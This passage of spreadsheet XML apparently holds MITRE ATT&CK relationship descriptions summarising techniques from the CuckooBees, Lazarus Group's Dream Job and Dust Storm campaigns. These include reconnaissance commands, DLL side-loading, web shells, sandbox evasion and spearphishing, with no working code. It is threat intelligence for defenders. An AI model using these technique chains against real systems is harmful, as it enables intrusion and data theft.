    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--75a779b1-7b77-40bd-86cd-7ef5e54e78c1</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--db13473b-3541-4be6-a5ad-042e83b37e3e</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors collected data, files, and other information from compromised networks.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--ea944454-a4e9-44fb-9cf1-3f018a455740</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--7903f25e-388e-4cda-bd09-bc83fa64d62e</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used compromised domain administrator credentials as part of their lateral movement.(Citation: Cybereason OperationCuckooBees May 2022) </t>
  </si>
  <si>
    <t>relationship--269229ec-bb95-4ad1-b68e-267b2cce4f24</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors exploited multiple vulnerabilities in externally facing servers.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--83ac4384-a6a8-42d1-9b1b-273902c57144</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</si>
  <si>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</si>
  <si>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relationship--1b85db78-5473-4cfb-8908-13b108289df2</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `dir c:\\` to search for files.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--1c9b32f8-f78d-4580-b183-676c7203286d</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors stroed payloads in Windows CLFS (Common Log File System) transactional logs.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--a2648a96-b282-4624-a91c-f97688c2f3b1</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), attackers used a signed kernel rootkit to establish additional persistence.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--e6a1906d-43d1-454c-8150-053759421b74</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net user` command to gather account information.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--71819612-01e7-48cf-89ea-09da4f05c2e8</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net group` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--938fe8be-be14-41a6-9db5-238866bb77ea</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors renamed a malicious executable to `rundll32.exe` to allow it to blend in with other Windows system files.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--6a9d5f63-e3f8-4980-834b-f83660095e5c</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net share` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--d7f25b51-f596-4745-8c2d-b0fa074a89b5</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net accounts` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--55b9483d-2d73-433c-ad5a-d29dcce6e4e4</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `fsutil fsinfo drives` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--0882cca9-ed77-4c71-85e4-78988d79236f</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `tasklist` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--e53818ed-808a-46f6-a266-098f19895379</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net view` and `ping` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--0d6b67b8-016a-4335-89f1-2cdb7ed778c1</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</si>
  <si>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</si>
  <si>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relationship--80e20d44-b799-4734-9de3-009f564f3ca0</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</si>
  <si>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</si>
  <si>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relationship--b69fa422-d118-4d30-948b-422e737b1116</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `systeminfo` command to gather details about a compromised system.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--2026783b-b6c7-432f-9c28-72090cb5539a</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--2f61aca0-55a8-46cb-aa37-a1789fc07c40</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net session`, `net use`, and `netstat` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--bb7ce54a-20a5-434e-99f1-ad37cbac0777</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--71f80d4d-daf5-4da2-811b-0ebd3365b79c</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net start` command as part of their initial reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--e9af5cec-1afb-46da-9d2c-1c0c78ea312b</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net time` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--23c72a20-1982-4207-9905-d3aa45f94c23</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors obtained publicly-available JSP code that was used to deploy a webshell onto a compromised server.(Citation: Cybereason OperationCuckooBees May 2022)   </t>
  </si>
  <si>
    <t>relationship--5f3f6350-5e69-4b50-a0c7-c1f04ae85976</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--be6891d8-5053-4877-836d-b8fd47cb74de</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors enabled HTTP and HTTPS listeners.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--b6d0a9fa-a908-4837-9484-91d07cde5e42</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors generated a web shell within a vulnerable Enterprise Resource Planning Web Application Server as a persistence mechanism.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--b3fc9f8c-9074-42b8-a144-ad97aa017dce</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used batch scripts to perform reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--b2e82bbd-629f-47e6-9306-970d12d0f0bc</t>
  </si>
  <si>
    <t>During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.(Citation: Cybereason OperationCuckooBees May 2022)</t>
  </si>
  <si>
    <t>relationship--128ecd12-77db-4117-be2f-2bf5476de670</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) archived victim's data into a RAR file.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--fc62ec8c-5015-4f02-b9b6-3964082d101d</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) performed brute force attacks against administrator accounts.(Citation: ESET Lazarus Jun 2020) </t>
  </si>
  <si>
    <t>relationship--62192379-d052-4618-be33-8511d636c67c</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) digitally signed their own malware to evade detection.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--5e3c0815-5dc8-44a4-9dce-16bff49fb218</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) digitally signed their malware and the dbxcli utility.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--96ff6190-cb11-4473-a194-abbf317205b8</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used code signing certificates issued by Sectigo RSA for some of its malware and tools.(Citation: ESET Lazarus Jun 2020) </t>
  </si>
  <si>
    <t>relationship--8a78d2b1-e15c-4985-a1a4-fb2af9824f33</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used malicious Trojans and DLL files to exfiltrate data from an infected host.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--61cfb178-a097-4788-a084-48d0d7c602b5</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that used the `IsDebuggerPresent` call to detect debuggers.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--bcf36359-e8be-4842-8174-489a679f32a4</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--8f1bdb28-7941-4b76-bcf3-2fe73321f0c5</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) registered a domain name identical to that of a compromised company as part of their BEC effort.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--4f590bfb-0436-4d8e-a5a1-5bd1dfcf350d</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) compromised domains in Italy and other countries for their C2 infrastructure.(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--2c095f1e-211d-4e84-b521-9cef12f1e83f</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</si>
  <si>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</si>
  <si>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relationship--2a13b64a-2173-4565-aca6-bbf3edfdc499</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) exfiltrated data from a compromised host to actor-controlled C2 servers.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--6ddbec2b-2a42-476f-919d-da3e4b06a1e2</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--b8458076-fd1f-48e1-a637-57690c4fe59d</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) removed all previously delivered files from a compromised computer.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--15e25965-b5e9-4b8c-b052-8a2233b30198</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted word searches within documents on a compromised host in search of security and financial matters.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--a5872314-732e-4896-a817-13986774d62c</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted extensive reconnaissance research on potential targets.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--5e3036ee-9d90-4fbb-a435-ff6caf9d38c6</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) gathered victim organization information to identify specific targets.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--44468587-67b5-4c44-8c2b-ed2b4769f055</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) targeted Windows servers running Internet Information Systems (IIS) to install C2 components.(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--a2c0d9fd-5ce9-4df1-8218-771b111bc1e4</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) targeted specific individuals within an organization with tailored job vacancy announcements.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--7ab5eaf4-49de-4680-88f2-6d4c876934b8</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</si>
  <si>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</si>
  <si>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relationship--8ebf7956-a41c-4f3c-b586-a38a107518d6</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</si>
  <si>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</si>
  <si>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relationship--27b3c824-888f-4c03-8cf6-5235da956381</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted internal spearphishing from within a compromised organization.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--7064e494-5a32-4a40-b0b1-b19b9a145e73</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</si>
  <si>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</si>
  <si>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relationship--7f74dcb1-6ce2-4247-8ea2-58caea335094</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</si>
  <si>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</si>
  <si>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relationship--3c2b63fe-e891-4ac5-a0aa-d02536699614</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</si>
  <si>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</si>
  <si>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relationship--d1bd6ce6-eb5f-41a1-b26f-4fe0d83e51ea</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) disguised malicious template files as JPEG files to avoid detection.(Citation: McAfee Lazarus Jul 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--154d0730-b087-46ce-9ae2-b1a551ff4ab8</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server.(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--0eed42c5-98b2-409a-abaf-95915fc93d79</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</si>
  <si>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</si>
  <si>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relationship--c3d73dc3-06f6-422a-9be2-c4eb3ce36fbc</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used PowerShell commands to explore the environment of compromised victims.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--431f7f45-8955-48d3-948a-891ed2a59c3f</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) placed LNK files into the victims' startup folder for persistence.(Citation: McAfee Lazarus Jul 2020) </t>
  </si>
  <si>
    <t>relationship--16713b63-7fe7-41e0-b157-2d26a406881b</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used `regsvr32` to execute malware.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--ae1592ae-15a3-45e3-a509-4fe9be3f9ed9</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</si>
  <si>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</si>
  <si>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relationship--078fe5f7-91b4-4864-960a-24c64b14996e</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) created scheduled tasks to set a periodic execution of a remote XSL script.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--7e12ea45-1adc-4c0c-95a7-68d5215760dc</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) acquired servers to host their malicious tools.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--35fe4117-1f37-4968-8b9a-21ce4217516f</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) compromised servers to host their malicious tools.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--f5c80a6c-8bbe-449d-80fb-8c5d7035d25d</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used LinkedIn to identify and target employees within a chosen organization.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--f73d269a-9a0d-4485-9587-e0f0f2335c35</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) created fake LinkedIn accounts for their targeting efforts.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--14fac9a8-f835-492b-b4df-32b677ac9030</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) packed malicious .db files with Themida to evade detection.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)</t>
  </si>
  <si>
    <t>relationship--b01660bb-1725-42f4-9419-495b8710e930</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent emails with malicious attachments to gain unauthorized access to targets' computers.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--98c14ff6-0e71-4cfe-ae3f-bc8a7f0c5260</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent malicious OneDrive links with fictitious job offer advertisements via email.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--f998689d-ce01-4ece-87a0-906255177e55</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent victims spearphishing messages via LinkedIn concerning fictitious jobs.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--79cf4f25-6d05-4756-a671-2d578c6db184</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used an AES key to communicate with their C2 server.(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--3658d2f3-25f5-404a-bf0b-7c5fce9978f6</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that conducted a variety of system checks to detect sandboxes or VMware services.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--1bbc2179-9302-4f21-98b8-b1f60ceafed3</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--04791b5e-1795-4a1c-a10d-71f919fc420e</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used DOCX files to retrieve a malicious document template/DOTM file.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)</t>
  </si>
  <si>
    <t>relationship--55323dcc-68cb-4e92-bcf3-33c7d26f9b5e</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used tools that collected `GetTickCount` and `GetSystemTimeAsFileTime` data to detect sandbox or VMware services.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--57e7d8ef-33dd-4a08-bce2-e516a9662383</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) obtained tools such as Wake-On-Lan, [Responder](https://attack.mitre.org/software/S0174), ChromePass, and dbxcli.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--b6f6b1e0-8e37-4f0a-b506-66537d3f0ff0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</si>
  <si>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</si>
  <si>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relationship--061c7b3d-775a-403f-9fd6-af0962a2e25e</t>
  </si>
  <si>
    <t>For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used multiple servers to host malicious tools.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--269bad6d-f72d-4deb-b125-7cb1e032efc8</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</si>
  <si>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</si>
  <si>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relationship--1f6da45b-bf15-47d7-ab80-5c110b0f4d62</t>
  </si>
  <si>
    <t xml:space="preserve">During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) uses HTTP and HTTPS to contact actor-controlled C2 servers.(Citation: McAfee Lazarus Jul 2020) </t>
  </si>
  <si>
    <t>relationship--b7362262-2738-4d3f-a993-c116557a4eaa</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used file hosting services like DropBox and OneDrive.(Citation: ClearSky Lazarus Aug 2020)</t>
  </si>
  <si>
    <t>relationship--78a7e89b-4560-4105-adfb-47393c39625b</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</si>
  <si>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</si>
  <si>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relationship--e39b2ccc-79ee-4dee-a5e7-49f61d762ef4</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used WMIC to executed a remote XSL script.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--afd3118f-bde5-4c02-8e82-045edec0dfdc</t>
  </si>
  <si>
    <t>During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used a remote XSL script to download a Base64-encoded DLL custom downloader.(Citation: ESET Lazarus Jun 2020)</t>
  </si>
  <si>
    <t>relationship--c4ea56ee-ac98-40bd-a609-9c694fad391d</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), attackers used VBS code to decode payloads.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--e359da34-bc39-4e72-9db1-49aa5da6c8b4</t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established domains as part of their operational infrastructure.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--4f1793cb-51f9-47d0-a2a7-374a57f56b82</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used a watering hole attack on a popular software reseller to exploit the then-zero-day Internet Explorer vulnerability CVE-2014-0322.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--820a35e0-11fe-42c4-84d2-a29cc5026426</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>relationship--b965ddc5-3017-4857-9a3d-44aaf24b6bfd</t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors established email addresses to register domains for their operations.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--dc64a0c1-9302-4816-8b1d-b6b348f12efb</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</si>
  <si>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</si>
  <si>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relationship--c837d369-bb16-464b-9cae-8eca38124c4e</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used JavaScript code.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--cea08e8e-2209-4d29-bc76-722091344259</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--33666771-34e3-41a9-8e98-57a99e92c40a</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors relied on a victim clicking on a malicious link sent via email.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--387640be-2b25-40c3-9048-f6cb86beab78</t>
  </si>
  <si>
    <t xml:space="preserve">For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors disguised some executables as JPG files.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>relationship--aba65eb4-6bd9-40bc-9b06-48b86e9a85e2</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors executed JavaScript code via `mshta.exe`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--b00d5e69-736f-47b9-befd-f5593550ad11</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</si>
  <si>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</si>
  <si>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relationship--a3b40306-fafa-47e6-9164-fbd75e04b645</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--c1214ef3-9bff-4702-8f54-4e6ddf955d93</t>
  </si>
  <si>
    <t>For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used UPX to pack some payloads.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--583335b0-7d65-4fbb-aa41-3bbbd08598cd</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails that contained a malicious Microsoft Word document.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--713c3a5e-931b-4c43-a945-c26f031b0183</t>
  </si>
  <si>
    <t>During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails containing a malicious link.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--e8009877-1d59-4742-8d9a-61e0cda1f0b1</t>
  </si>
  <si>
